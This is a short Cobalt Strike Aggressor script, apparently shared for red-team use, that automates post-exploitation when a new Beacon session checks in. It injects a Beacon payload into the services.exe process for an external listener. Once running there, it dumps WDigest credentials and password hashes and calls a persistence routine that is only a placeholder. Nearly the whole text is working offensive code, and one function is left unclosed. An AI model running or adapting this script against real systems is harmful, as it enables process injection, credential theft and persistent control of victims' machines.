#################################################
# Created by @jgaudard  :: I don't twitter much
# Aggressor script for initial_beacon with cobaltstrike
# Created: 29 Sept 2016 Modified: 14 Mar 2017
# Version 1.5
#################################################

$listener = "remote - 443";

sub getanypid {
  bps($1, lambda({
    local('$pid $name $entry');
    foreach $entry (split("\n", $2)) {
      ($name, $ppid, $pid) = split("\\s+", $entry);
      if ($name eq $proc) {
        # $1 is our Beacon ID, $pid is the PID of $proc
        [$callback: $1, $proc, $pid];
      }
    }
  }, $proc => $2, $callback => $3));
}

sub persistence {  
  if (beacon_info($1, 'is64') == 1) {  
    ## do stuff;  
  }  
  else {  
    ## do different stuff;  
  }


on beacon_initial {
  local('$b');
  bsleep($1, 15, 50);
  $b = beacon_info($1, 'pid');
  getanypid($1, "services.exe", lambda({
    if ($3 != $b) {
      if (beacon_info($1, 'is64') == 1) {
        binject($1, $3, $listener, 'x64');
      }
      else {
        binject($1, $3, $listener, 'x86');
      }
      bsleep($1, 240, 50);
    }
    else {
      bwdigest($1);
      bhashdump($1);
      bsleep($1, 30, 50);
      persistence($1);
    }
  },\$b));
}


